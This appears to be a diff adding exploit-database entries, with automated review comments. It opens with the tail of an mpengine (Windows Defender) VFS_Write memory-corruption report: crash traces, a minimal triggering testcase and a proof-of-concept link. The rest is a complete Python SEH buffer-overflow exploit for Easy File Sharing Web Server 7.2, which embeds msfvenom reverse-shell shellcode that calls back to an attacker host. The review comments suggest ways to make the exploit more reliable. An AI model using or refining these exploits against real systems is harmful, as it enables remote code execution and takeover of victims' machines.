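+0192ee9c 6682088b 0192eeb8 66823dd2 0192f7dc mpengine+0x20085f
+0192eea4 66823dd2 0192f7dc 0192f7dc 947413be mpengine+0x20088b
+0192eeb8 66820829 0192f7dc 003e7cd8 66820790 mpengine+0x203dd2
+0192eed8 66823d4a 0192f7dc 00000000 9474121a mpengine+0x200829
+0192ef1c 6682d2a0 0192f7dc 0000800c 0192f7dc mpengine+0x203d4a
+0192ef30 668820be 947409ce 66881ba0 00370bf8 mpengine+0x20d2a0
+0192f4c8 66881b5f 00004039 0192f7dc 00000030 mpengine!_rsignal+0x76e
+0192f4f0 66881a1e 0192f7dc 00000030 94740bfe mpengine!_rsignal+0x20f
+0192f6f8 66881987 0192f7dc 00000030 0192f758 mpengine!_rsignal+0xce
+0192f708 71436eff 003d5c60 00004039 0192f7dc mpengine!_rsignal+0x37
+0192f758 7061480b 003d5bf8 00004039 0192f7dc mpsvc!rsignal_wrapper+0xef (FPO: [Non-Fpo])
+0192f784 706478b4 0192f7dc 0192f828 00000000 mprtp!RealtimeProtection::CCMEngine::NotifyChange+0x7e (FPO: [1,2,0])
+0192f7a0 70647b53 9479983c 00000004 70647900 mprtp!RealtimeProtection::MpNotifyChangeEx+0x9a (FPO: [Non-Fpo])
+0192f870 70646b0a 01dfa2a8 01dda8b8 01dfa2a8 mprtp!RealtimeProtection::MpOpenProcessNotificationWorker+0x253 (FPO: [Non-Fpo])
+0192f888 70649aec 70649ab0 01dda8b0 0192f8ac mprtp!RealtimeProtection::AsyncNotificationWorker+0x86 (FPO: [Non-Fpo])
+0192f898 70617e47 005209e8 70617dd0 947998e0 mprtp!RealtimeProtection::CAsyncNotificationWorkItem::ExecuteJob+0x3c (FPO: [0,1,4])
+0192f8ac 73f3389a 01dda8b8 947c55e2 76f7268c mprtp!CommonUtil::CMpThreadPoolItemBase::DoAction+0x77 (FPO: [Non-Fpo])
+0192f8e8 76f126d5 0192f948 0051c2b8 003a0c00 mpclient!CommonUtil::CMpThreadPoolProviderVista::WorkCallback+0xca (FPO: [Non-Fpo])
+0192f90c 76f30774 0192f948 003a0c60 77749e94 ntdll!TppWorkpExecuteCallback+0x10f (FPO: [Non-Fpo])
+0192fa5c 75f1ef8c 003a4e58 0192faa8 76f6367a ntdll!TppWorkerThread+0x562 (FPO: [Non-Fpo])
+0192fa68 76f6367a 003a4e58 77749e60 00000000 kernel32!BaseThreadInitThunk+0xe (FPO: [Non-Fpo])
+0192faa8 76f6364d 76f302cb 003a4e58 00000000 ntdll!__RtlUserThreadStart+0x70 (FPO: [Non-Fpo])
+0192fac0 00000000 76f302cb 003a4e58 00000000 ntdll!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo])
+2: kd> lmv m mpengine
+start end module name
+66620000 67015000 mpengine (export symbols) mpengine.dll
+Loaded symbol image file: mpengine.dll
+Image path: c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{CCD47945-D7B4-402F-99F0-622F76161ECD}\mpengine.dll
+Image name: mpengine.dll
+Timestamp: Tue May 23 10:52:27 2017 (592476DB)
+CheckSum: 00A1867D
+ImageSize: 009F5000
+Translations: 0000.04b0 0000.04e4 0409.04b0 0409.04e4
+
+################################################################################
+
+I had some time to minimize the bug, a minimal testcase would be this:
+
+MpApiCall("NTDLL.DLL", "VFS_Write", 1, Buf, 0, 0xffffffff, 0);
+MpApiCall("NTDLL.DLL", "VFS_Write", 1, Buf, 0x7ff, 0x41414141, 0);
+
+The first call extends the length of the file to nOffset, but because the numberOfBytes parameter is 0 no space is allocated. Then you can read and write arbitrary data to an arbitrary offset to the MutableByteStream object buffer. This is a very powerful exploit primitive, and exploitation does not seem difficult.
+
+################################################################################
+
+Here is a better testcase that crashes in a memcpy to a bad destination offset.
+
+(gdb) r
+Starting program: mpclient testcase.exe
+main(): Scanning testcase.exe...
+EngineScanCallback(): Scanning input
+
+Program received signal SIGSEGV, Segmentation fault.
+0xf6e98c08 in ?? ()
+(gdb) x/i $pc
+=> 0xf6e98c08: rep movs DWORD PTR es:[edi],DWORD PTR ds:[esi]
+(gdb) p/x $edi
+$1 = 0xc7028a20
+(gdb) p/x $esi
+$2 = 0x843e228
+(gdb) x/10xb $esi
+0x843e228: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
+0x843e230: 0x00 0x00
+(gdb) x/10xb $edi
+0xc7028a20: Cannot access memory at address 0xc7028a20
+(gdb) r
+
+################################################################################
+
+stacktrace on windows:
+
+2: kd> r
+eax=c7c13828 ebx=1ca71d90 ecx=00000400 edx=00001000 esi=1ca71d90 edi=db6625b8
+eip=669c44e0 esp=0242c210 ebp=0242c234 iopl=0 nv up ei pl nz na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
+mpengine!memcpy+0x250:
+001b:669c44e0 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
+2: kd> dd edi
+db6625b8 ???????? ???????? ???????? ????????
+db6625c8 ???????? ???????? ???????? ????????
+db6625d8 ???????? ???????? ???????? ????????
+db6625e8 ???????? ???????? ???????? ????????
+db6625f8 ???????? ???????? ???????? ????????
+db662608 ???????? ???????? ???????? ????????
+db662618 ???????? ???????? ???????? ????????
+db662628 ???????? ???????? ???????? ????????
+2: kd> kv
+ChildEBP RetAddr Args to Child
+0242c214 66a84a47 db6625b8 1ca71d90 00001000 mpengine!memcpy+0x250 (FPO: [3,0,2])
+0242c234 66d73203 1ca71d90 00001000 00001000 mpengine!std::list<std::pair<wchar_t const * const,CommonUtil::AutoRefWrapper<AttributeValueStore> >,std::allocator<std::pair<wchar_t const * const,CommonUtil::AutoRefWrapper<AttributeValueStore> > > >::erase+0x72 (FPO: [Non-Fpo])
+0242c258 66d732b9 1ca76db8 00001000 41414000 mpengine!Modification::read+0x79 (FPO: [Non-Fpo])
+0242c2a0 66d736db 1ca76db8 00001000 41414000 mpengine!MutableStore::MutableByteStream::read+0xa3 (FPO: [Non-Fpo])
+0242c2dc 66d737db 02f923e4 000007ff 41414141 mpengine!MutableStore::MutableByteStream::write+0xa0 (FPO: [Non-Fpo])
+0242c320 66d6dfbb 00000544 02f923e4 000007ff mpengine!MutableStore::writeStrm+0xab (FPO: [Non-Fpo])
+0242c35c 66d6b463 00000596 02f923e4 000007ff mpengine!VirtualFS::write+0x79 (FPO: [4,5,4])
+0242c3a0 66c1eea8 02f923e4 000007ff 41414141 mpengine!VFS_Write+0x34 (FPO: [Non-Fpo])
+0242c410 66b71e01 02ed0020 02f20610 fdeee3e7 mpengine!NTDLL_DLL_VFS_Write+0x78 (FPO: [Non-Fpo])
+0242c440 66d840da 02f203a8 0309877f 02f20601 mpengine!__call_api_by_crc+0x114 (FPO: [Non-Fpo])
+0242c468 030987a8 669eeca2 02f203a8 0309877f mpengine!x32_parseint+0x1ba (FPO: [Non-Fpo])
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42264.zip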
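Review bot: The two testcases call `VFS_Write` with different argument counts — `i, (uint64_t) "data", 0, 0` in the fuzzing loop versus `1, Buf, 0, 0xffffffff, 0` in the minimized version — and neither names the parameters, so a reader has to recover the order from the crash stack, where `MutableByteStream::write` receives `02f923e4 000007ff 41414141`, i.e. buffer, numberOfBytes, nOffset. A comment on the minimized pair such as `// VFS_Write(hFile, buf, numberOfBytes, nOffset, ...): zero-length write grows the stream to nOffset without allocating` would make the primitive described in the following paragraph readable without the trace. The loop also discards the `VFS_Open` return value and uses the loop counter as the handle, which is presumably adequate for a crash reproducer but is worth stating so nobody assumes handles are sequential by design. The first paragraph names `KERNEL32.DLL!VFS_Write` while every call targets `"NTDLL.DLL"`; one of the two should be corrected.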
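--- a/platforms/windows/remote/42261.py
+++ b/platforms/windows/remote/42261.py
@@ -0,0 +1,91 @@
+#!/usr/bin/python
+# Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP Request (PassWD) Buffer Overflow (SEH)
+# Date: 19 June 2017
+# Exploit Author: clubjk
+# Author Contact: jk@jkcybersecurity.com
+# Vendor Homepage: http://www.sharing-file.com
+# Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe
+# Version: Easy File Sharing Web Server 7.2
+# Tested on: WinXP SP3
+# Usage: ./exploit.py
+# [*] Connecting to Target 192.168.188.132...standby...
+# [*] Successfully connected to 192.168.188.132...
+# [*] Sending improperly formed request...
+# [!] Request has been sent!
+
+
+import socket,os,time, sys
+
+host = "192.168.188.132"
+port = 80
+
+
+#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.188.133 LPORT=2345 -f py -b "\x00"
+buf = ""
+buf += "\xdb\xd2\xd9\x74\x24\xf4\x5f\xba\xb7\xe7\x7d\x1e\x29"
+buf += "\xc9\xb1\x52\x83\xef\xfc\x31\x57\x13\x03\xe0\xf4\x9f"
+buf += "\xeb\xf2\x13\xdd\x14\x0a\xe4\x82\x9d\xef\xd5\x82\xfa"
+buf += "\x64\x45\x33\x88\x28\x6a\xb8\xdc\xd8\xf9\xcc\xc8\xef"
+buf += "\x4a\x7a\x2f\xde\x4b\xd7\x13\x41\xc8\x2a\x40\xa1\xf1"
+buf += "\xe4\x95\xa0\x36\x18\x57\xf0\xef\x56\xca\xe4\x84\x23"
+buf += "\xd7\x8f\xd7\xa2\x5f\x6c\xaf\xc5\x4e\x23\xbb\x9f\x50"
+buf += "\xc2\x68\x94\xd8\xdc\x6d\x91\x93\x57\x45\x6d\x22\xb1"
+buf += "\x97\x8e\x89\xfc\x17\x7d\xd3\x39\x9f\x9e\xa6\x33\xe3"
+buf += "\x23\xb1\x80\x99\xff\x34\x12\x39\x8b\xef\xfe\xbb\x58"
+buf += "\x69\x75\xb7\x15\xfd\xd1\xd4\xa8\xd2\x6a\xe0\x21\xd5"
+buf += "\xbc\x60\x71\xf2\x18\x28\x21\x9b\x39\x94\x84\xa4\x59"
+buf += "\x77\x78\x01\x12\x9a\x6d\x38\x79\xf3\x42\x71\x81\x03"
+buf += "\xcd\x02\xf2\x31\x52\xb9\x9c\x79\x1b\x67\x5b\x7d\x36"
+buf += "\xdf\xf3\x80\xb9\x20\xda\x46\xed\x70\x74\x6e\x8e\x1a"
+buf += "\x84\x8f\x5b\x8c\xd4\x3f\x34\x6d\x84\xff\xe4\x05\xce"
+buf += "\x0f\xda\x36\xf1\xc5\x73\xdc\x08\x8e\xbb\x89\xae\xcb"
+buf += "\x54\xc8\xce\xda\x8d\x45\x28\xb6\xdd\x03\xe3\x2f\x47"
+buf += "\x0e\x7f\xd1\x88\x84\xfa\xd1\x03\x2b\xfb\x9c\xe3\x46"
+buf += "\xef\x49\x04\x1d\x4d\xdf\x1b\x8b\xf9\x83\x8e\x50\xf9"
+buf += "\xca\xb2\xce\xae\x9b\x05\x07\x3a\x36\x3f\xb1\x58\xcb"
+buf += "\xd9\xfa\xd8\x10\x1a\x04\xe1\xd5\x26\x22\xf1\x23\xa6"
+buf += "\x6e\xa5\xfb\xf1\x38\x13\xba\xab\x8a\xcd\x14\x07\x45"
+buf += "\x99\xe1\x6b\x56\xdf\xed\xa1\x20\x3f\x5f\x1c\x75\x40"
+buf += "\x50\xc8\x71\x39\x8c\x68\x7d\x90\x14\x98\x34\xb8\x3d"
+buf += "\x31\x91\x29\x7c\x5c\x22\x84\x43\x59\xa1\x2c\x3c\x9e"
+buf += "\xb9\x45\x39\xda\x7d\xb6\x33\x73\xe8\xb8\xe0\x74\x39"
+
+crash = "/.:/" #unusual but needed
+crash += "A"*53 #offset
+crash += "\xeb\x10\x90\x90" #seh
+crash += "\x05\x86\x01\x10" #pop pop ret ImageLoad.dll (WinXP SP3)
+crash += "D"*10 #junk
+crash += buf #shellcode
+crash += "E"*2600 #total string needs to be about 3000 chars
+
+
+request = "GET /vfolder.ghp HTTP/1.1\r\n"
+request += "Host: " + host + "\r\n"
+request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + "\r\n"
+request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n"
+request += "Accept-Language: en-US,en;q=0.5" + "\r\n"
+request += "Accept-Encoding: gzip, deflate" + "\r\n"
+request += "Referer: " + "http://" + host + "/" + "\r\n"
+request += "Cookie: SESSIONID=16246; UserID=PassWD=" + crash + "; frmUserName=; frmUserPass=;"
+request += " rememberPass=202.197.208.215.201"
+request += "\r\n"
+request += "Connection: keep-alive" + "\r\n"
+request += "If-Modified-Since: Mon, 19 Jun 2017 17:36:03 GMT" + "\r\n"
+
+print "[*] Connecting to Target " + host + "...standby..."
+
+s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+
+
+try:
+connect=s.connect((host, port))
+print "[*] Successfully connected to " + host + "!!!"
+except:
+print "[!] " + host + " didn't respond\n"
+sys.exit(0)
+
+
+print "[*] Sending improperly formed request..."
+s.send(request + "\r\n\r\n")
+print "[!] Request has been sent!\n"
+s.close()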
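Review bot: The shellcode was generated with only NUL excluded (`-b "\x00"` in the msfvenom comment), yet the third `buf +=` line contains `\x0a`, and the payload is carried inside the `Cookie:` header; any HTTP parser that accepts a bare LF as a line terminator truncates the header there, so the exploit's reliability rests on the target's lenient parsing rather than on the payload being header-safe. Regenerating with `-b "\x00\x0a\x0d\x3b"` (NUL, LF, CR and the cookie separator `;`) removes that dependency; the usage banner reports a successful run on WinXP SP3, so this is a robustness point, not a confirmed failure. Separately, `s.send(request + "\r\n\r\n")` does not promise that the whole ~3 KB request leaves in one call — `s.sendall(request + "\r\n\r\n")` does — and the bare `except:` around `s.connect` also swallows `KeyboardInterrupt`, where `except socket.error:` is the narrower choice.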